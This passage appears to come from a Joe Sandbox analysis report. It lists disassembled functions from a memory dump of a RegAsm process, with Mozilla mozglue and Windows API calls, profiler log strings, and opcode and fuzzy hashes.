                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                      • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                      • API String ID: 1579816589-753366533
                                                                                      • Opcode ID: fb61f4c32999105ed4817dd088d0d74e0bbd0492db7f8555552150dfd7d12cdd
                                                                                      • Instruction ID: fd30b94b3a0b6d9a27129836e5af33125c4f3759a49eb7235027b8ad91bffced
                                                                                      • Opcode Fuzzy Hash: fb61f4c32999105ed4817dd088d0d74e0bbd0492db7f8555552150dfd7d12cdd
                                                                                      • Instruction Fuzzy Hash: 2F11E03A305214ABCB04AF1AC948EF57779FB8636CF100065FA1583F41CB39A826DBA0
                                                                                      APIs
                                                                                        • Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
                                                                                        • Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1
                                                                                      • LoadLibraryW.KERNEL32(combase.dll,6C0F1C5F), ref: 6C0F20AE
                                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0F20CD
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F20E1
                                                                                      • FreeLibrary.KERNEL32 ref: 6C0F2124
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                      • String ID: CoInitializeSecurity$combase.dll
                                                                                      • API String ID: 4190559335-2476802802
                                                                                      • Opcode ID: f6290894ebed6982eac6eda90f5da77520226151997771a8a9e09893c72fb235
                                                                                      • Instruction ID: fb1bb02887c019f915913637b60b689e72935b48b7731358891d9dc5584ff58e
                                                                                      • Opcode Fuzzy Hash: f6290894ebed6982eac6eda90f5da77520226151997771a8a9e09893c72fb235
                                                                                      • Instruction Fuzzy Hash: 4A213D76205249EFDF11CF56DC48FAA3BB6FB4A369F104015FE2492610D73198A2EF61
                                                                                      APIs
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C1299C1
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C1299CE
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C1299F8
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C129A05
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C129A0D
                                                                                        • Part of subcall function 6C129A60: GetCurrentThreadId.KERNEL32 ref: 6C129A95
                                                                                        • Part of subcall function 6C129A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C129A9D
                                                                                        • Part of subcall function 6C129A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C129ACC
                                                                                        • Part of subcall function 6C129A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C129BA7
                                                                                        • Part of subcall function 6C129A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C129BB8
                                                                                        • Part of subcall function 6C129A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C129BC9
                                                                                        • Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
                                                                                        • Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA
                                                                                      Strings
                                                                                      • [I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C129A15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
                                                                                      • String ID: [I %d/%d] profiler_stream_json_for_this_process
                                                                                      • API String ID: 2359002670-141131661
                                                                                      • Opcode ID: 36c8fddb9227bd22c7b9e0d9707a7230c1dd266e3b6ffd6a42347a7c50b29b57
                                                                                      • Instruction ID: e01488524b4624be04276ef10505274b540ffbdeac7246b64ababdb552fcab51
                                                                                      • Opcode Fuzzy Hash: 36c8fddb9227bd22c7b9e0d9707a7230c1dd266e3b6ffd6a42347a7c50b29b57
                                                                                      • Instruction Fuzzy Hash: A201D63AA082259BDF006F2F94287B93B78EB4326CF054056FD5553F41D73C4855E6B1
                                                                                      APIs
                                                                                        • Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
                                                                                        • Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1
                                                                                      • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C0F1FDE
                                                                                      • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C0F1FFD
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F2011
                                                                                      • FreeLibrary.KERNEL32 ref: 6C0F2059
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                      • String ID: CoCreateInstance$combase.dll
                                                                                      • API String ID: 4190559335-2197658831
                                                                                      • Opcode ID: 8525d8d187b30cad086ce671f5b45cad9a303715b76eed88dfbc96d4b7a5b9fe
                                                                                      • Instruction ID: 22c9eadbb89c05e940d455af01c700752d16ee68dccccf2855a6da84602246f1
                                                                                      • Opcode Fuzzy Hash: 8525d8d187b30cad086ce671f5b45cad9a303715b76eed88dfbc96d4b7a5b9fe
                                                                                      • Instruction Fuzzy Hash: EF116A76306244EFDF10CF56C84CFAA3BB9EB46359F004029FD2482A41C7319C55EAA1
                                                                                      APIs
                                                                                        • Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
                                                                                        • Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1
                                                                                      • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C11D9F0,00000000), ref: 6C0F0F1D
                                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C0F0F3C
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F0F50
                                                                                      • FreeLibrary.KERNEL32(?,6C11D9F0,00000000), ref: 6C0F0F86
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                      • String ID: CoInitializeEx$combase.dll
                                                                                      • API String ID: 4190559335-2063391169
                                                                                      • Opcode ID: 695456114211e6e0da030c3e1e18c888db6f098fc0776134a8c0b7df81f18759
                                                                                      • Instruction ID: 25b041b1ab4f2f4748f670851232a9196524df3fca9b8d18452f03703abbf261
                                                                                      • Opcode Fuzzy Hash: 695456114211e6e0da030c3e1e18c888db6f098fc0776134a8c0b7df81f18759
                                                                                      • Instruction Fuzzy Hash: AA11867C709250DBEF00CF56C918B6637F4FB4A329F40822AFD2592F40D734984AEA56
                                                                                      APIs
                                                                                        • Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
                                                                                        • Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1
                                                                                      • LoadLibraryW.KERNEL32(combase.dll), ref: 6C0F631B
                                                                                      • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6C0F633A
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F634E
                                                                                      • FreeLibrary.KERNEL32 ref: 6C0F6376
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                      • String ID: CoUninitialize$combase.dll
                                                                                      • API String ID: 4190559335-3846590027
                                                                                      • Opcode ID: 4405c92032c56dcd78c14c0ae6fc8d58244c66ca68b9b5828efd0ba98a25e717
                                                                                      • Instruction ID: 75c86a45e998cd4f3441d79a7d1bc02e6d5dd8357eb5899c603f1d4340cc5ace
                                                                                      • Opcode Fuzzy Hash: 4405c92032c56dcd78c14c0ae6fc8d58244c66ca68b9b5828efd0ba98a25e717
                                                                                      • Instruction Fuzzy Hash: 45015ABA709201CFEB00CF2BD958B7477F0FB06318F044229ED21C2A80EB71A856EE55
                                                                                      APIs
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F559
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F561
                                                                                        • Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
                                                                                        • Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F577
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F585
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F5A3
                                                                                      Strings
                                                                                      • [I %d/%d] profiler_resume, xrefs: 6C12F239
                                                                                      • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C12F56A
                                                                                      • [I %d/%d] profiler_resume_sampling, xrefs: 6C12F499
                                                                                      • [I %d/%d] profiler_pause_sampling, xrefs: 6C12F3A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                      • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                      • API String ID: 2848912005-2840072211
                                                                                      • Opcode ID: 5ab22f385913d7447b0932eeb6ceeeed5ac9ef993260f8bc537af1735cd7ee76
                                                                                      • Instruction ID: 4362cc042e086064ba202957b0b7a9263b02b52d9563263c680337e88458855f
                                                                                      • Opcode Fuzzy Hash: 5ab22f385913d7447b0932eeb6ceeeed5ac9ef993260f8bc537af1735cd7ee76
                                                                                      • Instruction Fuzzy Hash: 52F0E27A700204AFDB006F6BD848B7A7BBCFB862ADF000051FA1583B01DB399805AB71
                                                                                      APIs
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F619
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C12F598), ref: 6C12F621
                                                                                        • Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
                                                                                        • Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F637
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000,?,6C12F598), ref: 6C12F645
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000,?,6C12F598), ref: 6C12F663
                                                                                      Strings
                                                                                      • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C12F62A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                      • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                      • API String ID: 2848912005-753366533
                                                                                      • Opcode ID: 48d1665eb1df013a15ff323790c4b63801427f96c12235fe0d65d3d1aa059ccf
                                                                                      • Instruction ID: 8fc46a31eab0520daca916816b7fa093d5518b95035df35d0c5142923ed61e7d
                                                                                      • Opcode Fuzzy Hash: 48d1665eb1df013a15ff323790c4b63801427f96c12235fe0d65d3d1aa059ccf
                                                                                      • Instruction Fuzzy Hash: 26F0827A300204AFDB006B6BC848F7A7B7DEB862ADF000055FA1583B41DB795C06A775
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll,6C0F0DF8), ref: 6C0F0E82
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C0F0EA1
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F0EB5
                                                                                      • FreeLibrary.KERNEL32 ref: 6C0F0EC5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                      • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                      • API String ID: 391052410-1680159014
                                                                                      • Opcode ID: 4d3309e9500c185d4a3751b7cc0da0d4833747492329d664b54b8a9f201f89f6
                                                                                      • Instruction ID: 412092774ea71f005bc2ce5c909ef2bc4b010e503a681c08a0a02069899b2306
                                                                                      • Opcode Fuzzy Hash: 4d3309e9500c185d4a3751b7cc0da0d4833747492329d664b54b8a9f201f89f6
                                                                                      • Instruction Fuzzy Hash: 170124B07182C18BDA008FAAC91CB66B7F5F74631CF100525AD3182B40DB35A4A9AA11
                                                                                      APIs
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C11CFAE,?,?,?,6C0E31A7), ref: 6C1205FB
                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C11CFAE,?,?,?,6C0E31A7), ref: 6C120616
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C0E31A7), ref: 6C12061C
                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C0E31A7), ref: 6C120627
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: _writestrlen
                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                      • API String ID: 2723441310-2186867486
                                                                                      • Opcode ID: 53f1afefa167a3048c210c6abcfdd77eb90ca885cee3cf82916864091858e878
                                                                                      • Instruction ID: 020c216d9ac26eb0f4dc0ee5e38df788c78326f3e81c15152bbdfc4094c05630
                                                                                      • Opcode Fuzzy Hash: 53f1afefa167a3048c210c6abcfdd77eb90ca885cee3cf82916864091858e878
                                                                                      • Instruction Fuzzy Hash: 6AE08CE2A0101437F5142256AC86EBB7A1CDBCA934F080039FD0D82301E94AAD2EA1F6
                                                                                      APIs
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C139BAE
                                                                                      • free.MOZGLUE(?,?), ref: 6C139BC3
                                                                                      • free.MOZGLUE(?,?), ref: 6C139BD9
                                                                                        • Part of subcall function 6C1393B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C1394C8
                                                                                        • Part of subcall function 6C1393B0: free.MOZGLUE(6C139281,?), ref: 6C1394DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                      • String ID:
                                                                                      • API String ID: 956590011-0
                                                                                      • Opcode ID: 731f43ae7037f9dbb323351063b20baeda08893d4dbdcc274e266f89f6c788d4
                                                                                      • Instruction ID: 03c4ffecfb62731b970c417d303990c012f48b9b0b20404126901ab57dd31f6c
                                                                                      • Opcode Fuzzy Hash: 731f43ae7037f9dbb323351063b20baeda08893d4dbdcc274e266f89f6c788d4
                                                                                      • Instruction Fuzzy Hash: E8B1BE71A04B158BCB01CF58C89059FF3F5BFC8328F148629E899AB741DB30E946CB91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eb730e4fa3d8b871a5abadcc1998a0c81af14faf17b5aa3f735771d5a9bfa288
                                                                                      • Instruction ID: 65fe71f43b4ae2bdd5a727b5d24ed92083285207d885fc1db75f461800db9a89
                                                                                      • Opcode Fuzzy Hash: eb730e4fa3d8b871a5abadcc1998a0c81af14faf17b5aa3f735771d5a9bfa288
                                                                                      • Instruction Fuzzy Hash: 83A14AB4A047458FDB14CF29C594B99FBF5BF48308F4486AAD89997B00E730AA95CF90
                                                                                      APIs
                                                                                        • Part of subcall function 6C126060: moz_xmalloc.MOZGLUE(00000024,F3604955,00000000,?,00000000,?,?,6C125FCB,6C1279A3), ref: 6C126078
                                                                                      • free.MOZGLUE(-00000001), ref: 6C1272F6
                                                                                      • free.MOZGLUE(?), ref: 6C127311
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$moz_xmalloc
                                                                                      • String ID: 333s$333s$Copied unique strings$Spliced unique strings
                                                                                      • API String ID: 3009372454-760240034
                                                                                      • Opcode ID: ca621c386297740a9416b46aef3e8055e474667bbf48370bfd2573c5a1ee2b3a
                                                                                      • Instruction ID: a6b1eba5842332c8ab5a5bb9871e98d15571e5c136313eed396475b85897b617
                                                                                      • Opcode Fuzzy Hash: ca621c386297740a9416b46aef3e8055e474667bbf48370bfd2573c5a1ee2b3a
                                                                                      • Instruction Fuzzy Hash: D0718475F002198FDB18CF69C89069EB7F2AF94314F25C12ED819A7750DB35A986CBC1
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C1414C5
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C1414E2
